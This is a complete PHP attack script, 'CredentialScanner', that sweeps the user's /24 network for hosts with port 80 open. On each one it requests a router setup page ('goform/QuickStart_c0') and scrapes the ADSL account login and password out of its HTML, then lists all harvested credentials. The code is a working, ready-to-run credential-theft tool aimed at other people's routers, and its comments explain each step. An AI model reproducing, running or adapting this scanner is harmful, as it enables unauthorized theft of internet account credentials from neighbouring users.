PHP : CredentialScanner v01


<?php
	/* CONFIGURATION */
		$config["ip_server"] = "http://www.whatismyip.com";
	/* END OF CONFIGURATION */

	/* ------ DON'T MODIFY ANYTHING BEYOND THIS LINE IF YOU'RE NOT SURE WHAT PHP IS !!! ------- */
	
	// Startup banner: two blank lines, the boxed title, three blank lines.
	echo implode("\n", array(
		"",
		"",
		"\t*********************************************************",
		"\t*                                                       *",
		"\t* CredentialScanner --  (CScan v.01)                    *",
		"\t* -- The automatic way to find adsl account credentials *",
		"\t*                                                       *",
		"\t*          Brought to you by the power of the wired !   *",
		"\t*                                                       *",
		"\t*********************************************************",
	)) . "\n\n\n";
	
	/**
	 * Fetches this host's public IPv4 address by reading $server, which is
	 * expected to echo the client's IP somewhere in its first 200 bytes.
	 *
	 * fopen() errors are suppressed with `@`, so a DNS/connect failure shows up
	 * only as the return code 1. The regex is a loose dotted-quad shape rather
	 * than a strict IPv4 validator (an octet like "199" matches), and group 1
	 * is the whole match, so $ip[1] is the first IP-looking token found.
	 *
	 * @param string $server URL of the echo page (see $config["ip_server"])
	 * @return string|int the address on success; 1 if $server could not be
	 *                    opened, 2 if no IP-looking token was found
	 *                    (both codes are mapped to messages by handle_error())
	 */
	function getLocalIP($server){
		echo "connecting to ".$server." ...\n";
		$handle = @fopen($server,"r");
		
		if($handle){
			// Only the first 200 bytes of the response are examined.
			$content = fread($handle,200);
			$val = preg_match("`((((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9])\.){3}((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9]))`",$content,$ip);

			if(!$val){
				return 2;
			}else{
				echo "fetching data ...\n";
				return $ip[1];
			}
		}else{
			return 1;
		}
	}
	
	/**
	 * Returns the dotted prefix of $ip up to, but not including, its last ".":
	 * "192.168.1.5" -> "192.168.1". main() appends ".1".."254" to this prefix.
	 * If $ip contains no ".", strrpos() yields false, which substr() coerces to a
	 * length of 0.
	 *
	 * @param string $ip dotted IPv4 address
	 * @return string
	 */
	function c_class($ip){
		$lastDot = strrpos($ip, ".");
		return substr($ip, 0, $lastDot);
	}
	
	/**
	 * Loose syntactic check for the ip_server setting: an optional http/https/ftp
	 * scheme, an optional "www.", one hyphen-separated alphanumeric host label and
	 * a 2-3 letter TLD, with nothing after it (no path, port or query).
	 *
	 * @param string $url
	 * @return bool true when the whole string matches the shape above
	 */
	function validate_url($url){
		$shape = "`^((http|https|ftp)://)?(www\.)?([0-9a-zA-Z]+(-[0-9a-z-A-Z]+)*)\.[a-zA-Z]{2,3}$`";
		return preg_match($shape, $url) === 1;
	}
	
	/**
	 * Prints a fatal message prefixed with "[!!]" and terminates the script
	 * with exit(-1). Never returns.
	 *
	 * @param string $msg
	 */
	function emsg($msg){
		printf("[!!] %s\n", $msg);
		exit(-1);
	}
	
	/**
	 * Prints a non-fatal message prefixed with "[warning]"; execution continues.
	 *
	 * @param string $msg
	 */
	function wmsg($msg){
		printf("[warning] %s\n", $msg);
	}
	
	/**
	 * Prints an informational message as an indented "-- ..." line surrounded by
	 * blank lines.
	 *
	 * @param string $msg
	 */
	function imsg($msg){
		printf("\n\t-- %s \n\n", $msg);
	}
	
	/**
	 * Maps a numeric status code to its message and severity.
	 *
	 * Codes 1 and 2 (returned by getLocalIP()) and any unknown code are fatal
	 * and go through emsg(), which exits; codes 3, 4 and 5 only warn via wmsg()
	 * and return, so callers continue. The switch compares loosely, exactly as
	 * the original did.
	 *
	 * @param int $error status code
	 */
	function handle_error($error){
		$fatal = true;
		switch($error){
			case 1: $msg = "Unable to connect to ip server"; break;
			case 2: $msg = "Unable to find any ip adress on the specified server"; break;
			case 3: $msg = "Invalid url for ip server [protocol://(www.)domain.ext]"; $fatal = false; break;
			case 4: $msg = "Unable to find the credentials on the target page (honeypot???)"; $fatal = false; break;
			case 5: $msg = "Unable to reach the target page"; $fatal = false; break;
			default: $msg = "Unknown error !!!";
		}
		$fatal ? emsg($msg) : wmsg($msg);
	}
	
	/**
	 * Reports whether $ip answers on TCP port 80.
	 *
	 * Two steps, both with errors suppressed by `@`:
	 *  1. gethostbyaddr(): when no PTR record exists it returns $ip unchanged,
	 *     and the host is then reported as "isn't alive" without any connect.
	 *  2. fsockopen($ip, 80) with a 10-second timeout; a successful connect is
	 *     treated as alive and the socket is closed straight away.
	 * $errno/$errstr are filled by fsockopen() but never read.
	 *
	 * Every call therefore causes a reverse-DNS query and, when a PTR exists, a
	 * TCP connection attempt to port 80 - the footprint a defender sees in DNS
	 * and firewall logs when main() iterates over the whole /24.
	 *
	 * @param string $ip dotted IPv4 address
	 * @return bool
	 */
	function is_alive($ip){
		$host = @gethostbyaddr($ip);
		if( $host == $ip ){
			echo "target ".$ip." isn't alive\n";
			return false;
		}else{
			echo $host." is alive, testing port 80 (http) ...\n";
			// Assigns and tests in one expression: parsed as !($handle = fsockopen(...)).
			if( !$handle = @fsockopen($ip, 80, $errno, $errstr, 10)){
				echo "target ".$ip." is not open on port 80 (http)\n";
				return false;
			}else{
				imsg("target ".$ip." open on port 80 (http)");
				if($handle) @fclose($handle);
				return true;
			}
		}
	}
	
	/**
	 * Requests $url . "goform/QuickStart_c0" and extracts the first two
	 * value='...' attributes from the response body.
	 *
	 * The page is read to EOF in 4096-byte chunks, then preg_match_all() collects
	 * every single-quoted value attribute made of [a-zA-Z0-9@]. The first hit is
	 * printed as "Login" and the second as "Password", and both are returned.
	 * The only network activity is that one HTTP fetch of a fixed path, which is
	 * what the target's web-server log records.
	 *
	 * @param string $url base URL ending in "/" (main() passes "http://<ip>/")
	 * @return array|int array(login, password) on success; 4 when no value
	 *                   attribute matched, 5 when the URL could not be opened
	 *                   (both mapped to warnings by handle_error())
	 */
	function the_function_who_is_more_evil_than_the_dervish_evil_ahahaha($url){
		echo "trying to get account credentials !!\n";

		$handle = @fopen($url."goform/QuickStart_c0","r");
		
		if($handle){
			$buffer = "";
			while (!feof($handle)) $buffer .= fgets($handle, 4096);
		    fclose($handle);
			
			// $ac[1] holds the captured values in document order.
			$val = preg_match_all("`value='([a-zA-Z0-9@]+)'`",$buffer,$ac);

			if(!$val){
				return 4;
			}else{
				echo "\n\tcredentials : \n";
				echo "\t\tLogin: ".$ac[1][0];
				echo "\n\t\tPassword: ".$ac[1][1];
				echo "\n\n";
				return array($ac[1][0],$ac[1][1]);
			}
		}else{
			return 5;
		}
	}
	
	/**
	 * Entry point: determines this host's public IP, then walks every address of
	 * its /24 (.1 to .254, skipping itself) and, for each host that answers on
	 * port 80, runs the credential-fetch routine; collected pairs are listed at
	 * the end.
	 *
	 * Control flow worth knowing:
	 *  - handle_error(3) only warns, so an ip_server URL that fails validation is
	 *    still passed on to getLocalIP().
	 *  - getLocalIp() resolves to getLocalIP(): PHP function names are
	 *    case-insensitive.
	 *  - Codes 1 and 2 reach emsg() and exit, so after the first if/else $ip is a
	 *    string.
	 *  - Codes 4 and 5 only warn, so the loop carries on with the next address.
	 */
	function main(){
		global $config;
		
		if( !validate_url($config["ip_server"]) ) handle_error(3);
		$ip = getLocalIp($config["ip_server"]);
		
		if(is_int($ip)){
			handle_error($ip);   // fatal: emsg() exits here
		}else{
			imsg("your ip adress is : ".$ip);
		}
		
		$cc = c_class($ip);
		echo "your c class: ".$cc."\n";
		
		$cred = array();
		// One reverse-DNS lookup and (at most) one connect per address in the /24.
		for($i=1; $i<255; $i++):
			$newip = $cc.".".$i;
			if( $newip != $ip):
				echo "testing if ".$newip." is alive\n";
				if( is_alive($newip)):
					$rep = the_function_who_is_more_evil_than_the_dervish_evil_ahahaha("http://".$newip."/");
					if( is_int($rep) ){
						handle_error($rep);   // 4 or 5: warning only, loop continues
					}else{
						$cred[] = $rep;
					}
				endif;
			endif;
		endfor;
		
		echo "\n-------------------- Scan terminated --------------------\n";
		
		echo "\nListing:\n";
		echo "\tlogin\t\tpassword\n\n";
		foreach($cred as $c):
			echo "\t".$c[0]."\t".$c[1]."\n";
		endforeach;
		
		echo "\n\n\t[exiting software... entering realworld stage]\n";
	}
	
	// Runs on load: this file both declares functions and executes (no guard).
	main();
?>